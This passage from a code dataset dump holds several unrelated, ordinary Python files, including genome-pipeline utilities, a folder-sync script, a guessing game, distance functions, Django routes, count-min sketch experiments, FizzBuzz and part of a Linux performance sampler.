process.stdout.readline()\n out = out.decode(\"utf-8\").strip('\\n')\n\n else :\n try:\n os.system(cmd)\n except :\n raise Exception(\"Command failed: \" + cmd + \"\\n\")\n exit (1)\n\n\ndef get_build_for_reference_genome(args):\n \"\"\"\n Function that checks the arguments and retrieves the build of the\n reference genome to use for the analysis.\n\n If none is provided, use hs38\n \"\"\"\n if args.build == None:\n return('GRCh37')\n else:\n if args.build in ['GRCh38', 'GRCh37']:\n return(args.build)\n else:\n logger.error('Build ' + args.build + ' not found')\n logger.error('Exiting...')\n exit(1)\n\n\ndef check_config_paths(config, logger):\n for software in config['software']['paths'].keys():\n path = config['software']['paths'][software]\n if type(path) == str and not os.path.exists(path):\n logger.error(\"Software does not exists -> \" +\\\n path)\n logger.error(\"Exiting...\")\n exit(1)\n\n for reference in config['ref']:\n path = config['ref'][reference]\n if type(path) == str and not os.path.exists(path):\n logger.error(\"Reference does not exists -> \" +\\\n path)\n logger.error(\"Exiting...\")\n exit(1)\n\n for db in config['dbs']:\n path = config['dbs'][db]\n if type(path) == str and not os.path.exists(path):\n logger.error(\"Database does not exists -> \" +\\\n path)\n logger.error(\"Exiting...\")\n exit(1)\n\n\n\ndef get_standard_config(config, init_conf, logger):\n\n NGS_SOFTWARE_BIN = init_conf['BIN_BIOTOOLS']\n\n config['ref'] = {\n # Ref Genomes\n \"GRCh38\": os.path.join(init_conf['REFGENOMES'], 'hs38', 'hs38.fa'),\n \"GRCh37\": os.path.join(init_conf['REFGENOMES'], 'hd37d5', 'hs37d5.fa')\n }\n\n config['software'] = {}\n config['software']['paths'] = {\n \"BWAPATH\": os.path.join(NGS_SOFTWARE_BIN, 'bwa'),\n \"SAMTOOLSPATH\": os.path.join(NGS_SOFTWARE_BIN, 'samtools'),\n \"FREEBAYESPATH\": os.path.join(NGS_SOFTWARE_BIN, 'freebayes'),\n \"FASTQCPATH\": os.path.join(NGS_SOFTWARE_BIN, 'fastqc'),\n \"PICARDPATH\": os.path.join(NGS_SOFTWARE_BIN, 'picard.jar'),\n \"ANNOVARPATH\": os.path.join(NGS_SOFTWARE_BIN, 'table_annovar.pl'),\n #\"BEDTOOLSPATH\": os.path.join(NGS_SOFTWARE_BIN, 'bedtools'),\n }\n\n config['dbs'] = {\n \"ANNOVARINFO\": os.path.join(NGS_SOFTWARE_BIN, 'annov_humandb'),\n }\n\n logger.debug(config)\n\n return(config)\n\ndef get_aditional_config(args, config, logger):\n config['conf'] = {}\n config['conf']['build'] = get_build_for_reference_genome(args)\n\n return(config)\n\n\ndef joinPath(pathItems):\n\n path = os.path.join(*pathItems)\n\n return(sanitisePath(path))\n\ndef sanitisePath(path):\n \"\"\" normalize and remove trailing slashes in paths\"\"\"\n return (os.path.normpath(path))\n\n\ndef check_excel_file(logger):\n return()\n\n\ndef recover_fastq_files(args, config, logger):\n\n fastq_folder = args.fastq_fold\n\n if not os.path.exists(fastq_folder):\n logger.warn('Input fastq files does not exists -> ' + fastq_folder)\n logger.warn('Exiting...')\n exit(1)\n\n input_fastq_files = glob.glob(os.path.join(fastq_folder, '*'))\n\n if len(input_fastq_files) < 2:\n logger.warn('List of fastq files recovered has fewer than 2 files -> ' + str(input_fastq_files))\n logger.warn('Exiting...')\n exit(1)\n\n return(input_fastq_files)\n","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"198483632","text":"#!/usr/bin/env python3\nimport sys, random\n\nassert sys.version_info >= (3,7), \"This script requires at least Python 3.7\"\n\n\nprint('Greetings!') # greets the player\ncolors = ['red','orange','yellow','green','blue','violet','purple'] # establishes all of those colors as possible answers\nplay_again = '' # allows the player the choice to play the game again\nbest_count = sys.maxsize # the biggest number\n\nwhile (play_again != 'n' and play_again != 'no'): # in the instance the player chooses not to play again by typing 'no' or 'n'\n match_color = random.choice(colors) # makes the right answer random out of the given color options\n count = 0 # number of tries is zero\n color = '' # players choose which color they think is correct\n while (color != match_color):\n color = input(\"\\nWhat is my favorite color? \") #\\n is a special code that adds a new line\n color = color.lower().strip() # makes it so entries are not incorrect for capitalization or additional spaces\n count += 1 # counts the number of guesses the player uses\n if (color == match_color): # describes the instance the player guesses the right color\n print('Correct!') # the result if the player guesses right\n else: # describes the instance the player guesses incorrectly\n print('Sorry, try again. You have guessed {guesses} times.'.format(guesses=count)) # the result if the player is wrong\n \n print('\\nYou guessed it in {} tries!'.format(count)) # tells the player how many guesses they used after the game\n\n if (count < best_count): # tells the player whether they guess in less tries than before\n print('This was your best guess so far!') # lets the player know this was the try they used the least amojunt of guesses\n best_count = count # allows program to remember this try as the best one so far\n\n play_again = input(\"\\nWould you like to play again (yes or no)? \").lower().strip() # gives player the option of trying again\n\nprint('Thanks for playing!') # closing statement befoe game ends","sub_path":"main10.py","file_name":"main10.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"470716659","text":"import ctypes\nimport os\nimport shutil\nimport stat\nimport sys\nimport time\nimport traceback\n\nLOG_DIR_PATH = \"C:\\\\Users\\\\Nic\\\\Documents\\\\Mine\\\\Coding\\\\file-copier\\\\logs\\\\\"\n\n\n# copies the contents of root_src_dir to root_dst_dir\n# files will only be overridden if they are more recently modified\n# files in root_dst_dir that aren't in root_src_dir will be deleted\ndef sync_folders(root_src_dir, root_dst_dir, log_only=False, force_delete=False, print_actions=False, log_visits=False):\n logger = Logger(LOG_DIR_PATH, force_delete=force_delete, print_actions=print_actions, log_visits=log_visits)\n try:\n logger.log(\"** Syncing %s with %s... **\" % (root_src_dir, root_dst_dir))\n logger.log(\"** Merging folders... **\")\n merge_folders(root_src_dir, root_dst_dir, logger, log_only, force_delete)\n logger.log(\"** Cleaning up destination folder... **\")\n delete_nonexistent_files(root_src_dir, root_dst_dir, logger, log_only, force_delete)\n except:\n error_occurred(logger)\n raise\n finally:\n print(\"Closing logger...\")\n logger.close()\n\n\n# copies the contents of root_src_dir to root_dst_dir\n# files will only be overridden if they are more recently modified\ndef merge_folders(root_src_dir, root_dst_dir, logger, log_only, force_delete):\n for src_dir, dirs, files in os.walk(root_src_dir):\n dst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)\n logger.log(\"Comparing folders {}...\".format(src_dir.replace(root_src_dir, \"\")), visit=True)\n\n logger.log(\"Checking folder {} exists...\".format(dst_dir), visit=True)\n if not os.path.exists(dst_dir):\n logger.log(\"Creating folder %s\" % dst_dir)\n if not log_only:\n os.makedirs(dst_dir)\n\n for file in files:\n logger.log(\"Looking for file {}...\".format(file), visit=True)\n src_file = os.path.join(src_dir, file)\n dst_file = os.path.join(dst_dir, file)\n\n if os.path.exists(dst_file):\n src_modified_time = os.stat(src_file).st_mtime\n dst_modified_time = os.stat(dst_file).st_mtime\n # replace file if it's older\n if dst_modified_time < src_modified_time:\n logger.log(\"Overwriting %s with %s \" % (dst_file, src_file))\n if not log_only:\n remove_file(dst_file, force_delete)\n shutil.copy2(src_file, dst_dir)\n else:\n logger.log(\"Copying file %s to \\n\\t%s\" % (src_file, dst_dir))\n if not log_only:\n shutil.copy2(src_file, dst_dir)\n\n\n# delete files and folders in root_dst_dir that aren't in root_src_dir\ndef delete_nonexistent_files(root_src_dir, root_dst_dir, logger, log_only, force_delete):\n for dst_dir, dirs, files in os.walk(root_dst_dir):\n logger.log(\"Checking folder {}...\".format(dst_dir.replace(root_src_dir, \"\")), visit=True)\n\n src_dir = dst_dir.replace(root_dst_dir, root_src_dir, 1)\n\n for file in files:\n logger.log(\"Checking file {}...\".format(file), visit=True)\n\n src_file = os.path.join(src_dir, file)\n dst_file = os.path.join(dst_dir, file)\n\n if not os.path.exists(src_file):\n logger.log(\"Removing file \" + dst_file)\n if not log_only:\n remove_file(dst_file, force_delete)\n\n if not os.path.exists(src_dir):\n logger.log(\"Removing folder and contents \" + dst_dir)\n if not log_only:\n shutil.rmtree(dst_dir, onerror=remove_readonly if force_delete else None)\n\n\ndef remove_readonly(func, path, excinfo):\n os.chmod(path, stat.S_IWRITE)\n for root, dirs, files in os.walk(path):\n for file_name in files:\n full_path = os.path.join(root, file_name)\n os.chmod(full_path, stat.S_IWRITE)\n func(path)\n\n\ndef remove_file(path, force_delete):\n try:\n os.remove(path)\n except PermissionError:\n if force_delete:\n os.chmod(path, stat.S_IWRITE)\n os.remove(path)\n else:\n raise\n\n\ndef error_occurred(logger):\n logger.log_error()\n message_box = ctypes.windll.user32.MessageBoxW(\n 0,\n logger.error_message(),\n \"Folder sync error\",\n 0x5)\n if message_box == 4:\n # retry clicked\n sync_folders(source_directory, destination_directory, logger, force_delete=True)\n\n\nclass Logger:\n def __init__(self, log_dir_path, print_actions=False, force_delete=False, log_visits=False):\n self.print_actions = print_actions\n self.force_delete = force_delete\n self.log_visits = log_visits\n\n self.most_recent_action = None\n\n time_str = time.strftime('%H.%M-%d-%b-%Y')\n self.log_file_name = \"log-\" + time_str + \".txt\"\n self.error_file_name = \"error-\" + time_str + \".txt\"\n\n if force_delete:\n self.log_file_name = self.log_file_name.replace(\".txt\", \"-forced.txt\")\n self.error_file_name = self.log_file_name.replace(\".txt\", \"-forced.txt\")\n\n self.log_dir_path = log_dir_path\n self.log_file = open(log_dir_path + self.log_file_name, \"w\")\n self.error_file = None\n\n def log(self, message, visit=False):\n if not visit:\n self.most_recent_action = message\n if not visit or self.log_visits:\n self.log_file.write(message + \"\\n\\n\")\n if self.print_actions:\n print(message)\n\n def log_error(self):\n self.error_file = self.error_file or open(self.log_dir_path + self.error_file_name, \"w\")\n self.error_file.write(traceback.format_exc())\n self.error_file.write(\"\\nError while completing action%s:\\n%s\" %\n (\" (forced mode)\" if self.force_delete else \"\",\n self.most_recent_action))\n\n def error_message(self):\n force_instructions = \"\" if self.force_delete else \"Press retry to rerun in forced mode.\"\n return \"There was an error when syncing folder %s with %s. %s See error.txt for more details. \\n\\n\" \\\n \"Error encountered while {}\".format(source_directory, destination_directory, force_instructions,\n self.most_recent_action.replace(source_directory, \"\")\n .replace(destination_directory, \"\"))\n\n def close(self):\n self.log_file.close()\n if self.error_file:\n self.error_file.close()\n\n\n# Sample usage via cmd\n# \"C:\\Program Files\\Python33\\python.exe\" \"C:\\Users\\Nic\\Documents\\Mine\\Coding\\file-copier\\sync-folders.py\" \"C:\\Users\\Nic\\Documents\\Mine\" \"C:\\Users\\Nic\\Google Drive\\Mine\" log force\n# arguments expected: src_dir dst_dir [log] [force] [actions]\n# log is optional. If present, no actions will be taken: only a log will be produced\n# force is optional. If present, the program will make an attempt to delete or overwrite read-only files if found\n# actions is optional. If present, the program will print its actions to standard output as it goes\n#\nif len(sys.argv) in (range(3, 7)):\n source_directory = sys.argv[1]\n if os.path.exists(source_directory):\n destination_directory = sys.argv[2]\n optional_args = sys.argv[3:]\n\n sync_folders(source_directory, destination_directory,\n log_only='log' in optional_args,\n force_delete='force' in optional_args,\n print_actions='actions' in optional_args,\n log_visits='log_visits' in optional_args or \"visits\" in optional_args\n )\n\n else:\n raise NotADirectoryError(source_directory)\nelse:\n raise SyntaxError(\"Must have 2 arguments: an existing source directory and the desired destination directory. 2 \"\n \"flags are optional.\")\n","sub_path":"sync-folders.py","file_name":"sync-folders.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"435107823","text":"# coding: utf-8\n#########################################################################\n# 网站:
疯狂Java联盟 #\n# author yeeku.H.lee kongyeeku@163.com #\n# #\n# version 1.0 #\n# #\n# Copyright (C), 2001-2018, yeeku.H.Lee #\n# #\n# This program is protected by copyright laws. #\n# #\n# Program Name: #\n# #\n#
Date: #\n#########################################################################\nfrom functools import *\nclass Cell:\n def __init__(self):\n self._alive = False\n # @property装饰器指定该方法可使用属性语法访问\n @property\n def alive(self):\n return self._alive\n def set_state(self, state):\n self._alive = bool(state)\n # 指定set_alive()方法就是将set_state()方法的state参数指定为True\n set_alive = partialmethod(set_state, True)\n # 指定set_dead()方法就是将set_state()方法的state参数指定为False\n set_dead = partialmethod(set_state, False)\nc = Cell()\nprint(c.alive)\n# 相当于调用c.set_state(True)\nc.set_alive()\nprint(c.alive)\n# 相当于调用c.set_state(False)\nc.set_dead()\nprint(c.alive)","sub_path":"官方配套代码/10/10.9/partialmethod_test.py","file_name":"partialmethod_test.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249462108","text":"#!/bin/env python\n# -*- coding:utf-8 -*-\n'''\n Get the linux os IP address\n'''\nimport os\nimport re\n\n\ndef getip():\n '''\n Get the linux os IP address\n '''\n result = os.popen('ip addr')\n result = result.read()\n #过滤IP地址,生成IP地址列表\n all_ip = re.findall(r\"inet\\s(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})\", result)\n\n #过滤掉127.0.0.1地址,并取第一个非127开头的地址作为返回值\n for _ip in all_ip:\n if not _ip.startswith('127'):\n return _ip\n #没有找到非127开头的IP地址,返回本机地址127.0.0.1\n return \"127.0.0.1\"\n","sub_path":"flasky/GetIP.py","file_name":"GetIP.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"337323848","text":"# %%\nimport matplotlib.pyplot as plt\nfrom numpy import random\nfrom math import sqrt\n\ndef inverseBetaCDF(u):\n return 1 - sqrt(1 - u)\n\nfig = plt.figure()\nax1 = fig.add_subplot(2, 1, 1)\nax2 = fig.add_subplot(2, 1, 2)\n\nu = random.rand(100000)\nax1.hist(u, range=(0.0, 1.0), density=True, bins=10)\nax1.set_ylabel('density')\nax1.set_xlabel('u')\n\nx = list(map(inverseBetaCDF, u))\nax2.hist(x, range=(0.0, 1.0), density=True, bins=10)\nax2.set_ylabel('density')\nax2.set_xlabel('x')\n# %%\n","sub_path":"beta-sample.py","file_name":"beta-sample.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"543249388","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nfrom gaebusiness.business import CommandExecutionException\nfrom tekton.gae.middleware.json_middleware import JsonResponse\nfrom chamada_app import chamada_facade\n\n\ndef index():\n cmd = chamada_facade.list_chamadas_cmd()\n chamada_list = cmd()\n chamada_form = chamada_facade.chamada_form()\n chamada_dcts = [chamada_form.fill_with_model(m) for m in chamada_list]\n return JsonResponse(chamada_dcts)\n\n\ndef new(_resp, **chamada_properties):\n cmd = chamada_facade.save_chamada_cmd(**chamada_properties)\n return _save_or_update_json_response(cmd, _resp)\n\n\ndef edit(_resp, id, **chamada_properties):\n cmd = chamada_facade.update_chamada_cmd(id, **chamada_properties)\n return _save_or_update_json_response(cmd, _resp)\n\n\ndef delete(_resp, id):\n cmd = chamada_facade.delete_chamada_cmd(id)\n try:\n cmd()\n except CommandExecutionException:\n _resp.status_code = 500\n return JsonResponse(cmd.errors)\n\n\ndef _save_or_update_json_response(cmd, _resp):\n try:\n chamada = cmd()\n except CommandExecutionException:\n _resp.status_code = 500\n return JsonResponse(cmd.errors)\n chamada_form = chamada_facade.chamada_form()\n return JsonResponse(chamada_form.fill_with_model(chamada))\n\n","sub_path":"backend/appengine/routes/chamadas/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"36557390","text":"import numpy as np\nimport pandas as pd\n\n#definisco qui la distanza:\ndef normalized_euclidean_distance(x, y):\n return 0.5 * np.var(x - y) / (np.var(x) + np.var(y))\n\ndef simple_match_distance(x, y):\n count = 0\n for xi, yi in zip(x, y):\n if xi == yi:\n count += 1\n sim_ratio = 1.0 * count / len(x)\n return 1.0 - sim_ratio\n\n\ndef normalized_square_euclidean_distance(ranges):\n def actual(x, y, xy_ranges):\n return np.sum(np.square(np.abs(x - y) / xy_ranges))\n return lambda x, y: actual(x, y, ranges)\n\n\ndef mad_distance(x, y, mad):\n val = 0.0\n for i in range(len(mad)):\n # print i, 0.0 if mad[i] == 0.0 else 1.0 * np.abs(x[i] - y[i]) / mad[i]\n # print i, np.abs(x[i] - y[i]) / mad[i]\n # val += 0.0 if mad[i] != 0 else 1.0 * np.abs(x[i] - y[i]) / mad[i]\n val += 0.0 if mad[i] == 0.0 else 1.0 * np.abs(x[i] - y[i]) / mad[i]\n # print val\n return val\n\n\ndef mixed_distance(x, y, discrete, continuous, classes_name, ddist, cdist):\n # type: (pandas.Series, pandas.Series, list, list, list, function, function) -> double\n \"\"\"\n This function return the mixed distance between instance x and instance y\n :param x: pandas.Series, instance 1\n :param y: pandas.Series, instance 2\n :param discrete: list of str, column names containing categorical variables\n :param continuous: list of str, column names containing non categorical variables\n :param classes_name: list of str, array of column names containing the label\n :param ddist: function, distance function for discrete variables\n :param cdist: function, distance function for continuos variables\n :return: double\n \"\"\"\n xd = [x[att] for att in discrete if att not in classes_name]\n wd = 0.0\n dd = 0.0\n if len(xd) > 0:\n yd = [y[att] for att in discrete if att not in classes_name]\n wd = 1.0 * len(discrete) / (len(discrete) + len(continuous))\n dd = ddist(xd, yd)\n\n xc = np.array([x[att] for att in continuous if att not in classes_name])\n wc = 0.0\n cd = 0.0\n if len(xc) > 0:\n yc = np.array([y[att] for att in continuous if att not in classes_name])\n wc = 1.0 * len(continuous) / (len(discrete) + len(continuous))\n cd = cdist(xc, yc)\n\n return wd * dd + wc * cd\n\n\ndef sorted_distances_df(X2E, i2e, discrete_var, continuous_var, classes_name,label_distance='distance'):\n \"\"\"\n This function returns the neighours of the instance sorted by closeness,\n the distance metric used is `mixed_distance()`\n\n :param X2E: dataframe, each row is an instance and the label was given by the black box, should NOT contain column(s) with labels\n :param i2e: pd.Series, instance to be explained\n :param discrete_var: array of str, names of X2E columns containing discrete features\n :param continuous_var: array of str, names of X2E columns containing continuous features\n :param class_name: array of str, name(s) of the column(s) containing the label\n :return: pandas dataframe\n \"\"\"\n indexes_values = X2E.index.values\n # distance between instance to explain and other instances\n distances = [mixed_distance(i2e,X2E.loc[i],discrete=discrete_var,continuous=continuous_var,classes_name=classes_name,ddist=simple_match_distance,cdist=normalized_euclidean_distance) for i in indexes_values]\n output = X2E.reset_index().rename(columns={'index':'old_index_'+label_distance})#.drop('index',1)\n output[label_distance] = pd.Series(distances)\n output = output.sort_values(by=label_distance,ascending=True).reset_index().drop('index',1)\n \n return output\n","sub_path":"multilabelexplanations/multilabelexplanations/distance_functions.py","file_name":"distance_functions.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"223554161","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('drawmatch', views.drawmatch, name='drawmatch'),\n path('drawmatch_backend', views.drawmatch_backend, name='drawmatch_backend'),\n path('generate_pdf', views.generate_pdf, name='generate_pdf'),\n path('genpdf_backend', views.genpdf_backend, name='genpdf_backend') ,\n path('record_score', views.record_score, name='record_score'),\n path('record_score_backend', views.record_score_backend, name='record_score_backend'),\n path('view_players', views.view_players, name='view_players'),\n path('add_player', views.add_player, name='add_player'),\n path('view_player', views.view_player, name='view_player'),\n path('edit_player', views.edit_player, name='edit_player'),\n path('edit_player_backend', views.edit_player_backend, name='edit_player_backend'),\n path('delete_player', views.delete_player, name='delete_player'),\n path('success', views.success, name='success'),\n path('fail', views.fail, name='fail'),\n path('match_history', views.match_history, name='match_history'),\n path('edit_schedule', views.edit_schedule, name='edit_schedule'),\n path('save_schedule', views.save_schedule, name='save_schedule'),\n path('view_schedule', views.view_schedule, name='view_schdeule'),\n path('delete_schedule', views.delete_schedule, name='delete_schedule'),\n path('delete_match', views.delete_match, name='delete_match'),\n path('delete_match_enter_score', views.delete_match_enter_score, name='delete_match_enter_score'),\n path('edit_match_enter_score', views.edit_match_enter_score, name='edit_match_enter_score'),\n path('edit_match_enter_score_backend', views.edit_match_enter_score_backend, name='edit_match_enter_score_backend'),\n path('list_draw', views.list_draw, name='list_draw')\n]\n","sub_path":"squashApp/squash_draw/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"434328997","text":"import numpy as np\nimport random as rd\nimport math\nimport statistics\nimport matplotlib.pyplot as plt\n\nM = 100\nN = 100000\nA = 5\nB = 10\n\ndef gen_uniform():\n\ta = []\n\tfor i in range(N):\n\t\ta.append(rd.randint(0, M - 1))\n\treturn a\n\ndef gen_exponential():\n\ta = np.random.exponential(1 / math.log(2, math.exp(1)), N)\n\ta = [int(i) for i in a]\n\treturn a\n\ndef get_summary(a):\n\tb = {}\n\tfor i in range(len(a)):\n\t\tif b.get(a[i]) == None:\n\t\t\tb[a[i]] = 1\n\t\telse:\n\t\t\tb[a[i]] = b[a[i]] + 1\n\treturn b\n\ndef check_prime(x):\n\tfor i in range(2, int(np.sqrt(x)) + 1):\n\t\tif x % i == 0:\n\t\t\treturn False\n\treturn True\n\ndef get_prime(x):\n\twhile check_prime(x) == False:\n\t\tx = x + 1\n\treturn x\n\ndef gen_hash():\n\th = []\n\tp = get_prime(B)\n\tfor i in range(A):\n\t\th.append((rd.randint(1, p - 1), rd.randint(0, p - 1)))\n\treturn h, p\n\ndef algo1(a, b, h, p):\n\tc = np.zeros((A, B)).astype(int)\n\tfor element in a:\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * element + h[i][1]) % p) % B\n\t\t\tc[i][temp] = c[i][temp] + 1\n\ts = {}\n\tfor key in b.keys():\n\t\tl = []\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * key + h[i][1]) % p) % B\n\t\t\tl.append(c[i][temp])\n\t\ts[key] = statistics.median(l)\n\treturn s\n\ndef algo2(a, b, h, p):\n\tc = np.zeros((A, B)).astype(int)\n\tfor element in a:\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * element + h[i][1]) % p) % B\n\t\t\tc[i][temp] = c[i][temp] + 1\n\ts = {}\n\tfor key in b.keys():\n\t\tl = []\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * key + h[i][1]) % p) % B\n\t\t\tif temp % 2 == 0:\n\t\t\t\tl.append(c[i][temp] - c[i][temp + 1])\n\t\t\telse:\n\t\t\t\tl.append(c[i][temp] - c[i][temp - 1])\n\t\ts[key] = statistics.median(l)\n\treturn s\n\ndef algo3(a, b, h, p):\n\tc = np.zeros((A, B)).astype(int)\n\tfor element in a:\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * element + h[i][1]) % p) % B\n\t\t\tc[i][temp] = c[i][temp] + 1\n\ts = {}\n\tfor key in b.keys():\n\t\tl = []\n\t\tfor i in range(A):\n\t\t\ttemp = ((h[i][0] * key + h[i][1]) % p) % B\n\t\t\tl.append(c[i][temp])\n\t\ts[key] = min(l)\n\treturn s\n\ndef plot_diff(b, s):\n\tb1 = sorted(b.items())\n\ts1 = sorted(s.items())\n\tr = []\n\tsum = 0\n\tfor i in range(len(b1)):\n\t\tr.append((b1[i][0], s1[i][1] / b1[i][1] - 1))\n\t\tsum = sum + np.abs(s1[i][1] / b1[i][1] - 1)\n\tprint(sum / len(b1))\n\tx, y = zip(*r)\n\tplt.plot(x, y)\n\tplt.show()\n\ndef main():\n\tu = gen_uniform()\n\tb = get_summary(u)\n\th, p = gen_hash()\n\ts1 = algo1(u, b, h, p)\n\ts2 = algo2(u, b, h, p)\n\ts3 = algo3(u, b, h, p)\n\tplot_diff(b, s1)\n\tplot_diff(b, s2)\n\tplot_diff(b, s3)\n\n\te = gen_exponential()\n\tb = get_summary(e)\n\th, p = gen_hash()\n\ts1 = algo1(e, b, h, p)\n\ts2 = algo2(e, b, h, p)\n\ts3 = algo3(e, b, h, p)\n\tplot_diff(b, s1)\n\tplot_diff(b, s2)\n\tplot_diff(b, s3)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"1a CS5234/Week6/Problem Set 6/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638076015","text":"# Problem: Implement Fizz Buzz\n# What is fizz buzz?\n## Return the string representation of numbers from 1 to n\n## Multiples of 3 -> 'Fizz'\n## Multiples of 5 -> 'Buzz'\n## Multiples of 3 and 5 -> 'FizzBuzz'\n\n\ndef fizz_buzz(num):\n s = [\"Fizz\",\"Buzz\",\"FizzBuzz\"]\n count = 5;\n if (num is None) or (num<1):\n raise Exception\n for i in range(1,num+1):\n if (i%3==0):\n count = 0;\n if (i%5==0):\n count = 1;\n if (i%3==0 and i%5==0):\n count = 2;\n if (count==5):\n print (i)\n count = 5\n continue\n print (\"count: \"+str(count))\n print (s[count])\n count = 5\n \n##fizz_buzz(15)\n\ndef fizz_buzz2(num):\n if (num is None) or (num<1):\n raise Exception\n for i in range(1,num+1):\n if i%3==0 and i%5==0:\n print (\"FizzBuzz\")\n continue\n if i%3==0:\n print (\"Fizz\")\n continue\n if i%5==0:\n print (\"Buzz\")\n continue\n print (i)\n \nfizz_buzz2(15)\n \n \n","sub_path":"Arrays and Strings/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"207113875","text":"#########################################\n# Function: sample linux performance indices\n# Usage: python sampler.py\n# Author: AIHC DEV TEAM\n# Company: AsiaInfo Inc.\n# Version: 2.2\n#########################################\n\nimport os\nimport os.path\nimport sys\nimport time\nimport datetime\nimport operator\nimport httplib\nimport logging\nimport socket\nimport random\nimport json\nfrom shutil import copyfile\nfrom subprocess import Popen, PIPE\nfrom logging.handlers import RotatingFileHandler\n\n# import ksql\n\nglobal logger\n# REMOTE_HOST = None\n# REMOTE_PORT = None\n# REMOTE_MONITOR_URI = None\n# UUID = None\nglobal roboter\n\n\ndef getIoFilter():\n disks = roboter.getConfigVal(\"disks\")\n if disks:\n arr = disks.split(',')\n str = \"\\\"||$1==\\\"\".join(arr)\n str = \"awk 'NULL==\\\"\" + str + \"\\\"'\"\n return str\n else:\n return None\n\n\ndef getNetWorks():\n networks = roboter.getConfigVal(\"ethernet\")\n if networks:\n return networks.split(',')\n else:\n return None\n\n\n# IFNAME = roboter.getConfigVal(\"ethernet\")\nIO_FILTER = getIoFilter()\n\n\n# IO_FILTER = \"awk 'NULL==\\\"sda\\\"'\"\n\ndef get_disk_partition():\n fileSystems = roboter.getConfigVal(\"fileSystems\").split(',')\n if fileSystems:\n return fileSystems\n else:\n return None\n\n\ndef get_mem_usage_percent():\n f = open('/proc/meminfo', 'r')\n for line in f:\n if line.startswith('MemTotal:'):\n mem_total = int(line.split()[1])\n elif line.startswith('MemFree:'):\n mem_free = int(line.split()[1])\n elif line.startswith('Buffers:'):\n mem_buffer = int(line.split()[1])\n elif line.startswith('Cached:'):\n mem_cache = int(line.split()[1])\n elif line.startswith('SwapTotal:'):\n m_total = int(line.split()[1])\n elif line.startswith('SwapFree:'):\n m_free = int(line.split()[1])\n else:\n continue\n f.close()\n physical_percent = usage_percent(mem_total - (mem_free + mem_buffer + mem_cache), mem_total)\n virtual_percent = 0\n if m_total > 0:\n virtual_percent = usage_percent((m_total - m_free), m_total)\n return physical_percent, virtual_percent, int(usage_unit(mem_total, 2)), usage_unit(\n mem_total - mem_free - mem_buffer - mem_cache, 2)\n\n\nblack_list = ('iso9660',)\n\n\ndef usage_unit(use, times):\n try:\n division = 1024\n count = 1\n while (count < times):\n count = count + 1\n division = division * 1024\n ret = use / division\n except ZeroDivisionError:\n raise Exception(\"ERROR - zero division error\")\n return float('%0.2f' % ret)\n\n\ndef usage_percent(use, total):\n try:\n ret = (float(use) / total) * 100\n except ZeroDivisionError:\n raise Exception(\"ERROR - zero division error\")\n return float('%0.2f' % ret)\n\n\ndef check_disk():\n try:\n return_dict = {}\n p_list = get_disk_partition()\n\n if not p_list:\n return None\n\n for i in p_list:\n dt = os.statvfs(i)\n use = (dt.f_blocks - dt.f_bfree) * dt.f_frsize\n all = dt.f_blocks * dt.f_frsize\n return_dict[i] = ('%.2f' % (usage_percent(use, all),), ('%.2f' % (all * 1.0 / (1024 * 1000000))))\n except:\n return None\n return return_dict\n\n\n_CLOCK_TICKS = os.sysconf(\"SC_CLK_TCK\")\n\n\ndef get_cpu_time():\n need_sleep = True\n if not os.path.isfile('../tmp/cpu_stat') or os.path.getsize('../tmp/cpu_stat') == 0:\n copyfile('/proc/stat', '../tmp/cpu_stat')\n need_sleep = True\n\n f1 = open('../tmp/cpu_stat', 'r')\n values1 = f1.readline().split()\n total_time1 = 0\n for i in values1[1:]:\n total_time1 += int(i)\n idle_time1 = int(values1[4])\n iowait_time1 = int(values1[5])\n f1.close()\n\n if need_sleep:\n time.sleep(1)\n\n f2 = open('/proc/stat', 'r')\n\n values2 = f2.readline().split()\n total_time2 = 0\n for i in values2[1:]:\n total_time2 += int(i)\n idle_time2 = int(values2[4])\n iowait_time2 = int(values2[5])\n\n f2.close()\n\n idle_time = idle_time2 - idle_time1\n iowait_time = iowait_time2 - iowait_time1\n total_time = total_time2 - total_time1\n\n cpu_percentage = int(100.0 * (total_time - idle_time - iowait_time) / total_time)\n # compensate logic\n if total_time < 0 or idle_time < 0 or iowait_time < 0 or cpu_percentage < 0 or cpu_percentage > 100:\n time.sleep(1)\n f3 = 